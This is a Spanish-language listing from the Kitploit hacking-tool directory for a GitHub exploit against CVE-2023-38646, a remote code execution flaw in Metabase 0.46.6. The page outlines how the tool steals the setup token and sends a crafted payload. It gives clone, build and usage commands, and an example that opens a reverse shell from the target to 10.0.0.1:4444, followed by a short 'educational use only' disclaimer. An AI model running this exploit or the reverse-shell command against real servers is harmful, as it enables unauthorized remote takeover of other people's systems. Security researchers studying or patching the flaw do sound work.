Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-38646 — Exploit para CVE-2023-38646 en Metabase 0.46.6, que permite la ejecución remota de código mediante solicitudes manipuladas y la recuperación del token de configuración. | Kitploit
Herramientas/GitHubGitHub/danithehack3r/cve-2023-38646
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónTroyano de Acceso Remoto
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Exploit para CVE-2023-38646 en Metabase 0.46.6, que permite la ejecución remota de código mediante solicitudes manipuladas y la recuperación del token de configuración.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-38646

Exploit para CVE-2023-38646 Metabase 0.46.6

Esta herramienta explota una vulnerabilidad (CVE-2023-38646) en una plataforma de software. El exploit permite la ejecución remota de código mediante una solicitud manipulada, aprovechando una cadena de conexión de base de datos manejada incorrectamente.

Descripción general

La herramienta:

  • Obtiene el token de configuración de la URL objetivo.
  • Codifica en Base64 el comando proporcionado.
  • Construye el payload con el comando codificado.
  • Envía el payload para explotar la vulnerabilidad.

Instalación

Clona el repositorio:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Uso

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: La URL de la plataforma que se va a escanear y explotar. COMMAND: El comando que se ejecutará en el objetivo. PROXY_URL (Opcional): La URL del servidor proxy (por ejemplo, http://127.0.0.1:8080). Si no se proporciona, no se utilizará ningún proxy.

Ejemplo con una reverse shell sh

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Aviso legal

Esta herramienta está destinada únicamente a fines educativos y de investigación. Asegúrate siempre de tener la autorización adecuada antes de escanear o explotar cualquier objetivo. El uso indebido de esta herramienta va estrictamente en contra de la intención del desarrollador y podría ser ilegal.

Comentarios y contribuciones

No dudes en abrir issues para cualquier comentario, error o solicitud de funciones. ¡Las pull requests siempre son bienvenidas!

Descargar herramienta